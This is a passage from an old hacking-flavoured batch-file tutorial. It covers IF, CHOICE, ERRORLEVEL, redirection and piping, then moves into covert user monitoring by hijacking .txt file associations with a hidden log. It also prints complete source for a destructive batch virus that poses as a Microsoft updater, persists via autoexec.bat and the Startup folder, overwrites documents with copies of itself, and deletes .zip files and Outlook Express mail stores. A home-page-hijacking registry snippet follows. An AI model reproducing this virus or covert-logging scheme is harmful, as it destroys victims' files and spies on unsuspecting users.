No something like IF C:\windows EXISTS ECHO Yes does not work. In

this case we need to make use of the NULL device. The NULL device is

basically nothing, it actually stands for simply nothing. Each directory

has the NULL device present in it. (At least DOS thinks so.) So to

check if c:\windows exits, simply type:

IF EXIST c:\windows\nul ECHO c:\Windows exists.

One can also check if a drive is valid, by giving something like:

IF EXIST c:\io.sys ECHO Drive c: is valid.

****************

Comparing Strings to Validate Parameters

The basic syntax is:

IF [NOT] string1==string2 Command

Now let's make our scripts intelligent and make them perform a task

according to what parameter was passed by the User. Take the

following snippet of code for example,

@ECHO off

IF %1==cp GOTO COPY

GOTO DEL

:COPY

Copy %2 a:

GOTO :END

:DEL

Del %2

:END

This example too is pretty much self explanatory. The IF Statement

compares the first parameter to cp, and if it matches then DOS is sent

to read the COPY label else to the DEL label. This example makes use

of two parameters and is called by passing at least two parameters.

We can edit the above example to make DOS check if a parameter was

passed or not and if not then display an error message. Just add the

following lines to the beginning of the above file.

@ECHO OFF

IF "%1" == "" ECHO Error Message Here

If no parameter is passed then the batch file displays an error

message. Similarly we can also check for the existence of the second

parameter.

This command too has the NOT clause.

The CHOICE Command

Before we learn how to make use of the CHOICE command, we need to

what error levels really are. Now Error levels are generated by

programs to inform about the way they finished or were forced to finish

their execution. For example, when we end a program by pressing

CTRL+C to end a program, the error level code evaluates to 3 and if the

program closes normally, then the error level evaluates to 0. These

numbers all by themselves are not useful but when used with the IF

ERROR LEVEL and the CHIOCE command, they become very kewl.

The CHOICE command takes a letter or key from the keyboard and

returns the error level evaluated when the key is pressed. The general

syntax of the CHOICE command is:

CHOICE[string][/C:keys][/S][/N][/T:key,secs]

The string part is nothing but the string to be displayed when the

CHOICE command is run.

The /C:keys defines the possible keys to be pressed. If options are

mentioned then the default Y/N keys are used instead.

For example, The command,

CHOICE /C:A1T0

Defines A, 1, T and O as the possible keys. During execution if the

user presses a undefined key, he will hear a beep sound and the program

will continue as coded.

The /S flag makes the possible keys defined by the CHOICE /c flag

case sensitive. So it means that if the /S flag is present then A and a

would be different.

The /N flag, if present shows the possible keys in brackets when the

program is executed. If the /N flag is missing then, the possible keys

are not shown in brackets. Only the value contained by STRING is

shown.

/T:key,secs defines the key which is taken as the default after a

certain amount of time has passed.

For Example,

CHOICE Choose Browser /C:NI /T:I.5

The above command displays Choose Browser[N,I] and if no key is

pressed for the next 5 seconds, then it chooses I.

Now to truly combine the CHOICE command with the IF ERROR LEVEL

command, you need to know what the CHOICE command returns.

The CHOICE command is designed to return an error level according to

the pressed key and its position in the /C flag. To understand this

better, consider the following example,

CHOICE /C:AN12

Now remember that the error level code value depends on the key

pressed. This means that if the key A is pressed, then the error level

is 1, if the key N is pressed then the error level is 2, if 1 is pressed

then error level is 3 and if 2 is pressed then error level is 4.

Now let us see how the IF ERROR LEVEL command works. The general

syntax of this command is:

IF [NOT] ERRORLEVEL number command.

This statement evaluates the current error level number. If the

condition is true then the command is executed. For Example,

IF ERRORLEVEL 3 ECHO Yes

The above statement prints Yes on the screen if the current error level

is 3.

The important thing to note in this statement is that the evaluation of

an error level is true when the error level us equal or higher than the

number compared.

For Example, in the following statement,

IF ERRORLEVEL 2 ECHO YES

The condition is true if the error level is > or = 2.

Now that you know how to use the CHOICE and ERROR LEVEL IF

command together, you can now easily create menu based programs. The

following is an example of such a batch file which asks the User what

browser to launch.

@ECHO OFF

ECHO.

ECHO.

ECHO Welcome to Browser Selection Program

ECHO.

ECHO 1. Internet Explorer 5.5

ECHO 2. Mozilla 5

ECHO x. Exit Browser Selection Program

ECHO.

CHOICE "Choose Browser" /C:12x /N

IF ERRORLEVEL 3 GOTO END

IF ERRORLEVEL 2 START C:\progra~1\Netscape

IF ERRORLEVEL 1 start c:\progra~1\intern~1\iexplore.exe

:END

NOTE: Observe the order in which we give the IF statements.

Redirection

Normally the Output is sent to the screen(The standard STDOUT)and

the Input is read from the

Keyboard(The standard STDIN). This can be pretty boring. You can

actually redirect both the Input and the

Output to something other than the standard I/O devices.

To send the Output to somewhere other than the screen we use the

Output Redirection Operator, > which is

most commonly used to capture results of a command in a text file. Say

you want to read the help on how to

use the net command, typing the usual Help command is not useful as

the results do not fit in one screen

and scroll by extremely quickly. So instead we use the Output

Redirection operator to capture the results of

the command in a text file.

c:\windows>net > xyz.txt

This command will execute the net command and will store the results in

the text file, xyz.txt . Whenever

DOS comes by such a command, it checks if the specified file exists or

not. If it does, then everything in the

file is erased or lost and the results are stored in it. If no such file

exists, then DOS creates a new file and

stores the results in this new file.

Say, you want to store the results of more than one command in the

same text file, and want to ensure that

the results of no command are lost, then you make use of the Double

Output Re Direction Symbol, which is

the >> symbol.

For Example,

c:\windows> net >> xyz.txt

The above command tells DOS to execute the net command and append

the output to the xyz.txt file, if it

exits.

DOS not only allows redirection to Files, but also allows redirection to

various devices.

DEVICE NAME USED DEVICE

AUX Auxiliary Device (COM1)

CLOCK$ Real Time Clock

COMn Serial Port(COM1, COM2, COM3,

COM4)

CON Console(Keyboard, Screen)

LPTn Parallel Port(LPT1, LPT2, LPT3)

NUL NUL Device(means Nothing)

PRN Printer

Say for example, you want to print the results of directory listings,

then you can simply give the following

command:

c:\windows>dir *.* > prn

The NUL device(nothing) is a bit difficult to understand and requires

special mention. This device which is

also known as the 'bit bucket' literally means nothing. Redirection to the

NUL device practically has no usage

but can be used to suppress the messages which DOS displays on the

completion of a task. For example,

when DOS has successfully copied a particular file, then it displays the

message: '1 file(s) copied.'

Now say you want to suppress this task completion message, then you

can make use of the NUL device.

c:\windows>copy file.txt > NUL

This will suppress the task completion message and not display it.

Redirecting Input

Just like we can redirect Output, we can also redirect Input. It is

handled by the Input Redirection Operator,

which is the < symbol. It is most commonly used to send the contents of

a text file to DOS. The other common

usage of this feature is the MORE command which displays a file one

screen at a time unlike the TYPE

command which on execution displays the entire file.(This becomes

impossible to read as the file scrolls by

at incredible speed.)Thus, many people send the long text file to the

MORE command by using the

command:

c:\windows>more < xyz.txt

This command sends the contents of the xyz.txt file to the MORE

command which displays the contents

page by page. Once the first page is read the MORE command displays

something like the following on the

screen:

......MORE......

You can also send key strokes to any DOS command which waits for

User Input or needs User intervention to perform a task. You can also

send multiple keystrokes. For example, a typical Format

command requires 4 inputs, firstly pressing Enter to give the command,

then Disk Insertion prompt, then the

VOLUME label prompt and lastly the one to format another disk. So

basically there are three User inputs-:

ENTER, ENTER N and ENTER.(ENTER is Carriage return)So you can

include this in a Batch file and give

the format command in the following format:

c:\windows>format a: < xyz.bat

PIPING

Piping is a feature which combines both Input and Output Redirection. It

uses the Pipe operator, which is the

symbol. This command captures the Output of one command and sends

it as the Input of the other

command. Say for example, when you give the command del *.* then you

need to confirm that you mean to

delete all files by pressing y. Instead we can simply do the same without

any User Interaction by giving the

command:

c:\windows> echo y del *.*

This command is pretty self explanatory, y is sent to the command del

*.*

Batch File Programming can be very easy and quite useful. The only

thing that one needs to be able to become a Batch File Programming

nerd, is adequate knowledge of DOS commands. I suggest you surf the

net or get a book on DOS commands and really lick the pages off the

book, only then can you become an expert.

Making your own Syslog Daemon

We can easily combine the power of batch file programs and the

customizable Windows Interface to make

our own small but efficient System Logging Daemon.

Basically this Syslog Daemon can keep a track of the files opened(any

kind of files), the time at which the

files were opened also actually post the log of the User's activities on

to the web, so that the System

Administrator can keep a eye on things.

Simply follow the following steps to make the daemon-:

NOTE: In the following example, I am making a syslog daemon which

keeps an eye on what text files were

opened by the User. You can easily change what files you want it to

keep an eye on by simply following the

same steps.

1. ASSOCIATING THE FILES TO BE MONITORED TO THE LOGGER

Actually this step is not the first, but being the easiest, I have

mentioned it earlier. The first thing to do is to

associate the text files(*.txt) files to our batch file which contains the

code to log the User's activities. You can

of course keep an eye on other files as well, the procedure is almost

similar. Anyway, we associate .txt files

to our batch program so that each time a .txt file is opened, the batch

file is also executed. To do this, we

need to change the File Associations of .txt files.

For more information on Changing File Associations, refer to the

Windows Help Files, simply type

Associations and search. Anyway to change the associations of .txt files

and to point them to our batch

file, simply do the below:

Locate any .txt file on your system, select it(click once) and Press the

SHIFT key. Keeping the SHIFT key

pressed, right click on the .txt file to bring up the OPEN WITH...

option. Clicking on the OPEN WITH... option

will bring up OPEN WITH dialog box. Now click on the OTHER button

and locate the batch file program

which contains the logging code and click on OPEN and OK.

Now each time a .txt file is opened, the batch file is also executed,

hence logging all interactions of the User

with .txt files.

2. Creating the Log File

Now you need to create a text file, which actually will act like a log file

and will log the activities of the User.

This log file will contain the filename and the time at which the .txt file

was opened. Create a new blank text

file in the same directory as the batch file. Now change the attributes

of this log file and make it hidden by

changing it's attributes by issuing the ATTRIB command.

C:\windows>attrib xyz.txt +h

This will ensure that a lamer will not know as to where the log file is

located.

3. CODING THE LOGGING BATCH FILE

The coding of the actual batch file which will log the User's activities

and post it on the web is quite simple. If

you have read this tutorial properly till now, then you would easily be

able to understand it, although I still

have inserted comments for novices.

echo %1 >> xyz.txt /* Send the file name of the file opened to the log

file, xyz.txt */

notepad %1 /* Launch Notepad so that the lamer does not know

something is wrong. */

This logging file will only log the filename of the text file which was

opened by the unsuspecting lamer, say

you want to also log the time at which a particular file was opened, then

you simply make use of the 'time'

command. The only thing that one needs to keep in mind is that after

giving the TIME command , we need

to press enter too, which in turn has to entered in the batch file too.

Say you, who are the system administrator does not have physical

access or have gone on a business trip,

but have access to the net and need to keep in touch with the server

log file, then you easily link the log file

to a HTML file and easily view it on the click of a button. You could also

make this part of the site password

protected or even better form a public security watch contest where the

person who spots something fishy

wins a prize or something, anyway the linking can easily be done by

creating an .htm or. html file and

inserting the following snippet of code:

Server Logs

Click here to read the Server Logs

That was an example of the easiest HTML page one could create.

Another enhancement that one could make is to prevent the opening of a

particular file. Say if you want to prevent the user from launching

abc.txt then you would need to insert an IF conditional statement.

IF "%1" == "filename.extension" ECHO Error Message Here

4. Enhancing the logging Batch file to escape the eyes of the Lamer.

To enhance the functioning of our logging daemon, we need to first know

it's normal functioning.

Normally, if you have followed the above steps properly, then each time

a .txt file is opened, the batch file

is launched(in a new window, which is maximized) and which in turn

launches Notepad. Once the filename

and time have been logged, the batch file Window does not close

automatically and the User has to exit

from the Window manually. So maybe someone even remotely intelligent

will suspect something fishy. We

can configure our batch file to work minimized and to close itself after

the logging process has been

completed. To do this simply follow the following steps-:

a) Right Click on the Batch File.

b) Click on properties from the Pop up menu.

c) In the Program tab click on the Close on Exit option.

d) Under the same tab, under the RUN Input box select Minimized.

e) Click on Apply and voila the batch file is now more intelligent

This was just an example of a simple batch file program. You can easily

create a more intelligent and more useful program using batch code.

MAKING YOUR OWN DEADLY BATCH FILE VIRUS: The atimaN_8

Batch File Virus

DISCLAIMER: This Virus was created by Ankit Fadia ankit@bol.net.in

and is meant for educational purposes only. This Virus was coded to

make people understand the basic concept of the Working of a Virus.

Execute this Batch File at your own Risk. Any Damage caused by this

file is not Ankit Fadia's fault. If you want any information regarding

this Virus, do please feel free to contact me at: ankit@bol.net.in also

visit my site at: http://www.crosswinds.net/~hackingtruths

The following is a simple but somewhat deadly (but quite lame)Batch File

Virus that I created. I have named it, atimaN_8 I have used no

advanced Batch or DOS commands in this virus and am sure that almost

all you will have no problem understanding the code, If you still have

trouble understanding the code, do mail me at ankit@bol.net.in

@ECHO OFF

CLS

IF EXIST c:\winupdt.bat GOTO CODE

GOTO SETUP

:SETUP

@ECHO OFF

ECHO Welcome To Microsoft Windows System Updater Setup

ECHO.

copy %0 c:\winupdt.bat >> NUL

ECHO Scanning System.....Please Wait

prompt $P$SWindows2000

type %0 >> c:\autoexec.bat

type %0 >> c:\windows\dosstart.bat

ECHO DONE.

ECHO.

ECHO Installing Components....Please Wait

FOR %%a IN (*.zip) DO del %%a

FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >>

NUL

FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >>

NUL

FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >>

NUL

ECHO DONE.

ECHO.

ECHO You Now Need to Register with Microsoft's Partner: Fortune

Galaxy to receive automatic updates.

PAUSE

ECHO Downloading Components...Please Wait

START "C:\Program Files\Internet Explorer\Iexplore.exe"

http://www.crosswinds.net/~hackingtruths

IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del

"C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-

9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"

IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address

Book\ankit.wab" del "C:\WINDOWS\Application

Data\Microsoft\Address Book\ankit.wab"

ECHO Setup Will Now restart Your Computer....Please Wait

ECHO Your System is not faster by almost 40%.

ECHO Thank you for using a Microsoft Partner's product.

copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >>

NUL

c:\WINDOWS\RUNDLL user.exe,exitwindowsexec

CLS

GOTO END

:CODE

CLS

@ECHO OFF

prompt $P$SWindows2000

IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC

type %0 >> c:\autoexec.bat

:ABC

type %0 >> c:\windows\dosstart.bat

FOR %%a IN (*.zip) DO del %%a

FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >>

NUL

FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >>

NUL

FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >>

NUL

START "C:\Program Files\Internet Explorer\Iexplore.exe"

http://www.crosswinds.net/~hackingtruths

IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del

"C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-

9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL

IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address

Book\ankit.wab" del "C:\WINDOWS\Application

Data\Microsoft\Address Book\ankit.wab" >> NUL

copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >>

NUL

GOTO :END

CLS

:END

CLS

This was an example of a pretty lame batch file virus. We can similarly

create a virus which will edit the registry and create havoc. This is just

a thought, I am not responsible for what you do with this.

There is simply no direct way of editing the Windows Registry through a

batch file. Although there are Windows Registry Command line

options(Check them out in the Advanced Windows Hacking Chapter, they

are not as useful as adding keys or editing keys, can be. The best

option we have is to create a .reg file and then execute it through a

batch file. The most important thing to remember hear is the format of

a .reg file and the fact that the first line of all .reg files should

contain nothing but the string REGEDIT4, else Windows wil not be able

to recognize it as a registry file. The following is a simple example of a

batch file which changes the home page of the User (If Internet

Explorer is installed)

to http://hackingtruths.tripod.com

@ECHO OFF

ECHO REGEDIT4 >ankit.reg

ECHO [HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main] >> ankit.reg

ECHO "Start Page"="http://hackingtruths.tripod.com" >> ankit.reg

START ankit.reg

Creating a .reg file is not as easy as it seems. You see, for Windows to

recognize a file as a Registry file and for Windows to add the contents

of the .reg file to the registry, it has to be in a particular recognizable

format, else an error message would be displayed. I would not want to

repeat, the entire Windows Registry File format here, as the Advanced

Windows Hacking Manual has a huge section, specially dedicated to the

Windows Registry.

Protection from Batch File Viruses

If you double-click a batch file (.bat files) it will run automatically.

This can be dangerous as batch files can contain harmful commands

sometimes. Worst still, if you use the single-click option, one wrong

click and it's goodbye Windows. Now most power users would like to set

edit as the default action. To best way to do that is to go to Explorer's

Folder Options' File View tab to change the modify the default action.

However, to add insult to injury, when you arrive there, you will find

that the Edit and Set Default buttons has been grayed out. This is a

"feature" from Microsoft you might not appreciate.

To conquer our problem here, flare up your registry editor and go to

HKEY_CLASSES_ROOT\batfile\shell\open Rename the open key to run,

thus becoming HKEY_CLASSES_ROOT\batfile\shell\run. Double-click

the EditFlags binary value in HKEY_CLASSES_ROOT\batfile and enter

00 00 00 00 as the new value. Now, open Explorer, click Folder Options

from the View menu and select the File Types tab, scroll down to the

"MS-DOS Batch File" item, highlight it and click Edit. You'll notice that

the last three buttons (Edit, Remove and Set Default) are now enabled

and that you can select Edit as the default action.

Continue reading →